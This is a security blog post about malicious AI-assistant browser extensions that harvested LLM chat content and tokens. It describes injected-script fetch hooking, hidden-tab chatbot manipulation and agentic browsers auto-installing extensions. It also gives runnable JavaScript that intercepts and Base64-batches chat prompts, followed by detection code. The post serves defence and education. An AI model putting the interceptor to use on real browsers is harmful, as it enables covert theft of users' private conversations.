TempMail Ninja

Malicious AI Extensions Exfiltrate Sensitive Data from LLM Chat Services


The digital frontier is constantly evolving, and with the rapid proliferation of Artificial Intelligence, so too are the tactics of malicious actors. A report from Microsoft in March 2026 brought to light a significant cybersecurity threat: the widespread distribution of malicious browser extensions disguised as legitimate AI assistants. These add-ons were present in over 20,000 enterprise environments, amassed approximately 900,000 installs, and quietly exfiltrated sensitive data from Large Language Model (LLM) chat services such as ChatGPT and DeepSeek. The incident is a stark warning that exposes critical gaps in organizational governance of browser extensions and of day-to-day AI tool usage.

The Trojan Horse in Your Browser: Anatomy of Malicious AI Extensions

The campaign leveraged a potent combination of user trust and the growing demand for AI-driven productivity tools. Threat actors crafted these extensions to mimic legitimate AI assistants, with convincing branding, user interfaces, and even permission prompts that looked like those a genuine assistant would need.

Deceptive Distribution and Widespread Reach

The primary distribution channel for these malicious AI extensions was the official Chrome Web Store. By presenting themselves as genuine productivity enhancers, some even acquired a “Featured” badge, further cementing their deceptive credibility. Because Google Chrome and Microsoft Edge share the Chromium architecture and Edge can install extensions from the Chrome Web Store, a single malicious listing compromised users across both browsers, magnifying the campaign’s reach. In some cases, “agentic browsers” were observed installing these extensions automatically on the strength of their convincing descriptions, bypassing explicit user approval.

Once installed, these extensions operated subtly, turning a seemingly trusted productivity tool into a persistent data collection mechanism.

Sophisticated Data Exfiltration Techniques

The core objective of these malicious AI extensions was long-term, persistent data exfiltration. The types of data harvested were extensive and highly sensitive:

  • LLM Chat Content: Full chat conversations, including both user prompts and AI responses, from platforms like ChatGPT and DeepSeek. This could expose proprietary code, internal workflows, strategic discussions, and other confidential corporate data.
  • Browsing Telemetry: Nearly all visited URLs, including internal company sites and the context of navigation (e.g., previous and next pages).
  • Authentication Tokens and Session Identifiers: Potential theft of these critical elements, increasing the risk of account takeover.
  • Direct File Access: In a related campaign (MaliciousCorgi) targeting Visual Studio Code (VS Code) extensions, threat actors were observed exfiltrating the entire contents of files as soon as they were opened, Base64-encoded and sent to attacker-controlled servers.

The operational techniques demonstrated a high degree of stealth and persistence. The extensions needed no special persistence mechanism: the browser reloads installed extensions on every start, so they simply came back with it. They also employed evasive consent mechanisms: even if users initially declined data collection, subsequent updates to the extension re-enabled telemetry by default, continuing the harvesting without explicit user approval. Exfiltrated data was staged locally as Base64-encoded JSON before being transmitted in periodic batches via HTTPS POST requests to attacker-controlled command-and-control (C2) infrastructure, with exfiltration cycles observed every 30 minutes.

A crucial technical aspect involves the “Man-in-the-Prompt” attack method, identified by LayerX. A malicious extension does not need broad permissions for this; a content script declared for the chat service’s domain is enough. A content script runs in an isolated JavaScript world that shares the page’s DOM but not its `window` functions, so to reach the page’s own `window.fetch` the extension injects a script into the page’s main world (for example via an injected `<script>` element or, in Manifest V3, a content script with `world: "MAIN"`). From there it can hook `window.fetch` to intercept outbound requests, or directly read and write the Document Object Model (DOM) of the page. This lets the extension manipulate user inputs, capture sensitive outputs, and even interact with the chatbot in a hidden browser tab, subsequently deleting the chat history to cover its tracks. Another observed technique creates a full-screen iframe pointing to an attacker-controlled domain, overlaid on the legitimate page, to capture user interactions with a convincing, yet fake, AI chat interface.
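To make the hook-and-stage pattern from the two preceding paragraphs concrete, here is an added example (not code from the Microsoft or LayerX reports, and not from any of the extensions): a page-world script that wraps `window.fetch`, copies prompt bodies bound for the chat backend into a staging queue, batches them as Base64-encoded JSON, and a heuristic integrity check a defender can run. The stand-in window, the `/backend-api/conversation` endpoint pattern, and the sample prompt are all constructed assumptions.

```javascript
// Added illustration of the fetch-hooking technique and a heuristic check against it.
// Everything here is constructed for the example: the stand-in window, the chat
// endpoint pattern and the staging queue are assumptions, not the campaign's code.

const CHAT_ENDPOINT = /\/backend-api\/conversation$/; // assumed chat backend path

// Constructed stand-in for a browser tab. A real window.fetch is a native function
// whose source text reads "[native code]"; binding a function makes V8 report the
// same text, which is enough to mimic that fingerprint in this simulation.
function createPageEnvironment() {
  const calls = [];
  const fetchImpl = async function fetch(url, init = {}) {
    calls.push({ url: String(url), method: init.method || 'GET' });
    return { ok: true, status: 200 };
  };
  return { fetch: fetchImpl.bind(null), calls };
}

// Attacker side: what a script injected into the page's main world does. It swaps
// window.fetch for a wrapper that copies the body of every POST to the chat endpoint
// into a staging queue, then forwards the request unchanged so the user notices nothing.
function installFetchInterceptor(win, stagingQueue) {
  const original = win.fetch;
  win.fetch = function fetch(url, init) {
    const target = String(url);
    if (init && init.method === 'POST' && CHAT_ENDPOINT.test(target)) {
      stagingQueue.push({ ts: Date.now(), url: target, body: String(init.body) });
    }
    return original.call(win, url, init);
  };
  return original;
}

// Staging step from the write-up: buffered records serialised as JSON and
// Base64-encoded, ready for the periodic HTTPS POST to C2. Clears the queue.
// (A content script would use btoa(); Buffer is used so this runs under Node.)
function buildExfilBatch(stagingQueue) {
  const batch = stagingQueue.splice(0, stagingQueue.length);
  return Buffer.from(JSON.stringify(batch), 'utf8').toString('base64');
}

function decodeExfilBatch(encoded) {
  return JSON.parse(Buffer.from(encoded, 'base64').toString('utf8'));
}

// Defender side: a heuristic a page or monitoring script can run. A genuine native
// fetch stringifies to "[native code]"; a plain JavaScript wrapper exposes its source.
// The check is evadable (bind the wrapper, override toString), so treat a hit as a
// signal to investigate, not as proof of compromise.
function fetchLooksNative(win) {
  return /\[native code\]/.test(Function.prototype.toString.call(win.fetch));
}

// Walks through the scenario on constructed traffic and returns what each side saw.
function runScenario() {
  const win = createPageEnvironment();
  const queue = [];
  const nativeBefore = fetchLooksNative(win);
  installFetchInterceptor(win, queue);
  const nativeAfter = fetchLooksNative(win);

  // Constructed user activity: one prompt to the chat backend and one unrelated request.
  const prompt = JSON.stringify({
    messages: [{ role: 'user', content: 'Summarise our Q3 revenue numbers' }],
  });
  win.fetch('https://chat.example.com/backend-api/conversation', { method: 'POST', body: prompt });
  win.fetch('https://chat.example.com/api/models', { method: 'GET' });

  const encoded = buildExfilBatch(queue);     // what the 30-minute cycle would send
  const captured = decodeExfilBatch(encoded); // what the C2 operator would read
  return {
    nativeBefore,
    nativeAfter,
    captured,
    forwardedCalls: win.calls.length,
    queueAfterFlush: queue.length,
  };
}
```

Two points worth noting. The interception is invisible to the user because the wrapper forwards every request to the real `fetch` after copying it, which is why the chat service keeps working normally. And the `[native code]` check only catches the naive wrapper shown here; an attacker who calls `.bind()` on the wrapper or replaces its `toString` defeats it, so it belongs in a layered monitoring story, not as a single gate.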

The Broader Landscape: Browser Extension Security and AI Governance Gaps

This incident is not an isolated event but a stark illustration of a rapidly evolving threat landscape where browser extensions have become a prime target for cybercriminals.

Browser Extensions as a Supply Chain Attack Vector

The concept of “supply chain attacks” has expanded beyond traditional software to include browser extensions. Threat actors increasingly purchase legitimate, popular extensions from their developers and then push malicious updates to the unsuspecting user base. Automatic extension updates, a mechanism designed to deliver security fixes quickly, are weaponized in this scenario, silently delivering malware to millions of users. These attacks exploit the trust users place in tools installed from official marketplaces, and detection is hard because the version that passed review may be entirely benign, with malicious code introduced only in a later update.

The Shadow AI Problem and DeepSeek’s Unique Risks

The incident also highlights the prevalent “shadow AI” phenomenon, where employees use unapproved AI tools outside of organizational oversight. This creates significant blind spots for security teams, leading to data breaches, compliance violations, and intellectual property loss.

Compounding this is the specific case of DeepSeek, one of the LLMs targeted by these extensions. Beyond being an exfiltration target, DeepSeek itself has been flagged for numerous inherent security and privacy issues. Reports indicate that DeepSeek stores data on servers in China, raising concerns about data sovereignty and potential access by Chinese state-linked entities due to domestic laws. Security researchers have identified critical flaws such as hard-coded encryption keys, unencrypted transmission of user and device data, and publicly accessible databases exposing sensitive chat history and API secrets. Furthermore, DeepSeek has demonstrated vulnerabilities to “jailbreak” exploits, allowing it to bypass safety filters and generate disallowed or dangerous content, a concern exacerbated when combined with malicious extensions that can manipulate its input.

The “Last Mile” of Security

The browser has become the “new security edge” for enterprises: most day-to-day work now happens inside it, through SaaS applications that hold sensitive organizational data. Traditional network defenses see only encrypted TLS traffic to those applications and cannot tell a legitimate API call from an exfiltration batch, leaving a critical “last mile” governance gap. Security teams consequently struggle to observe or control the exact moment sensitive corporate data is pasted into a chatbot, or the moment a risky AI-powered browser extension is installed.

Fortifying the Enterprise: Mitigation and Proactive Governance Strategies

Addressing the threat of malicious AI extensions requires a multi-faceted approach, combining robust technical controls with comprehensive policy and educational initiatives.

Enhanced Browser Extension Management

Organizations must implement rigorous policies for browser extension usage. This includes:

  • Inventory and Audit: Regularly inventory all installed browser extensions across the organization and audit their permissions and activities. Tools like Microsoft Defender Vulnerability Management can assist in this.
  • Principle of Least Privilege: Enforce least privilege for extensions, so they have access only to the data and functionality their purpose requires. Chrome and Edge enterprise policy (the `ExtensionSettings` policy with `blocked_permissions`) can refuse any extension that requests permissions such as access to all sites.
  • Allow-listing/Block-listing: Implement strict allow-listing of approved extensions and block-list everything else; in Chromium browsers this is the `ExtensionInstallBlocklist` policy set to `*` combined with `ExtensionInstallAllowlist`. Treat an allow-list entry as a decision about a version, not an ID, since a later update can turn a trusted extension malicious.
  • Continuous Monitoring: Monitor outbound POST traffic for known malicious endpoints, and also for traffic that matches the behaviour described above: small, regularly timed POSTs from browsers to a single unfamiliar host, which is what a 30-minute exfiltration cycle looks like from the network.
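The monitoring item above is easy to state and harder to operationalize, because the C2 hostnames are not known in advance. What is known is the cadence. The following added example (not a tool from the report, written for this page) parses constructed proxy log lines, groups POSTs by client and destination host, and flags pairs whose inter-request intervals are tightly regular, alongside a plain block-list match. The log format, the hostnames and every line of the sample log are constructed assumptions.

```javascript
// Added detection example: flag browser clients that POST to one host on a tight,
// regular schedule, which is what the 30-minute exfiltration cycle described above
// looks like in a proxy log. The log format and all lines below are constructed.

// Constructed proxy log: ISO timestamp, client, method, host, path, request bytes.
const SAMPLE_PROXY_LOG = `
2026-03-10T09:00:12Z 10.0.4.21 POST telemetry-assistant.example.net /collect 18432
2026-03-10T09:05:00Z 10.0.4.21 POST chat.example.com /backend-api/conversation 812
2026-03-10T09:20:00Z 10.0.4.22 GET  www.example.com / 0
2026-03-10T09:30:15Z 10.0.4.21 POST telemetry-assistant.example.net /collect 20110
2026-03-10T09:41:00Z 10.0.4.21 POST chat.example.com /backend-api/conversation 640
2026-03-10T10:00:09Z 10.0.4.21 POST telemetry-assistant.example.net /collect 17995
2026-03-10T10:30:14Z 10.0.4.21 POST telemetry-assistant.example.net /collect 19007
2026-03-10T11:10:00Z 10.0.4.21 POST chat.example.com /backend-api/conversation 710
`;

// Assumed block-list of previously identified C2 hosts (none appear in the sample).
const KNOWN_BAD_HOSTS = new Set(['old-c2.example.org']);

function parseProxyLog(text) {
  return text.trim().split('\n').map((line) => {
    const [ts, client, method, host, path, bytes] = line.trim().split(/\s+/);
    return { ts: Date.parse(ts), client, method, host, path, bytes: Number(bytes) };
  });
}

function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const mid = Math.floor(s.length / 2);
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Returns one finding per (client, host) pair that is either on the block-list or
// shows a regular POST cadence: every interval within maxJitter of the median.
// Genuine chat traffic is bursty and driven by a human, so it fails the test.
function findBeaconingPosts(events, { minEvents = 3, maxJitter = 0.1 } = {}) {
  const groups = new Map();
  for (const e of events) {
    if (e.method !== 'POST') continue;
    const key = `${e.client}|${e.host}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(e);
  }

  const findings = [];
  for (const [key, evs] of groups) {
    const [client, host] = key.split('|');
    if (KNOWN_BAD_HOSTS.has(host)) {
      findings.push({ client, host, reason: 'known bad host', periodMinutes: null, jitter: null });
      continue;
    }
    if (evs.length < minEvents) continue;
    const times = evs.map((e) => e.ts).sort((a, b) => a - b);
    const intervals = times.slice(1).map((t, i) => (t - times[i]) / 1000);
    const med = median(intervals);
    const jitter = Math.max(...intervals.map((iv) => Math.abs(iv - med))) / med;
    if (jitter <= maxJitter) {
      findings.push({ client, host, reason: 'regular cadence', periodMinutes: med / 60, jitter });
    }
  }
  return findings;
}

function analyseSampleLog() {
  return findBeaconingPosts(parseProxyLog(SAMPLE_PROXY_LOG));
}
```

On the sample log this reports a single finding: client 10.0.4.21 posting to telemetry-assistant.example.net roughly every 30 minutes with under 1% jitter, while the same client’s genuine chat traffic (intervals of 36 and 89 minutes) is not flagged. The thresholds are starting points; a real deployment would tune `maxJitter` against observed false positives from legitimate periodic clients such as update checkers, and enrich hits with the extension inventory from the first bullet to find which add-on is generating the traffic.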

Comprehensive AI Governance

The rapid adoption of generative AI necessitates a robust governance framework that extends beyond traditional IT security. Key practices include:

  • Clear Policies and Procedures: Establish, monitor, and enforce clear organizational policies and procedures regarding the use of AI tools, including guidelines on what types of data can be shared.
  • “Shadow AI” Discovery: Implement mechanisms such as network monitoring, SaaS log reviews, and employee surveys to identify and bring “shadow AI” usage under governance.
  • Data Security and Compliance: Leverage data security solutions like Microsoft Purview to implement AI data security and compliance controls, especially for sensitive data used in browser-based AI chat applications.

Advanced Browser Security and Contextual Governance

Emerging solutions and practices are focusing on securing the browser as the new enterprise perimeter:

  • Secure Enterprise Browsers: Investigate and adopt secure enterprise browsers or browser security platforms that are built with AI-specific controls. These tools offer deep visibility into browser-level interactions, allowing organizations to monitor prompt context, inspect extension permissions, and redact sensitive data in real-time without disrupting workflows.
  • Contextual Governance: Implement contextual governance frameworks that limit the autonomy of AI agents and dynamically verify the identity of both the AI agent and the human user before high-stakes tasks or data transfers. This involves granular policies, such as blocking the pasting of sensitive source code into chatbots or preventing the installation of high-risk AI extensions.
  • Employee Education: Crucially, educate employees about the risks associated with installing unverified browser extensions and sharing sensitive information with AI tools. Understanding the threat is the first line of defense.

The incident involving malicious AI extensions serves as a critical inflection point. It underscores the urgent need for organizations to proactively adapt their security postures to the complexities of the AI era. By treating the browser as a primary attack surface and implementing comprehensive governance around both extensions and AI tool usage, enterprises can better protect their sensitive data and maintain the integrity of their operations in this rapidly evolving digital landscape.

Written by

TempMail Ninja

Digital privacy and online security expert. Passionate about creating tools that protect users' identity on the internet.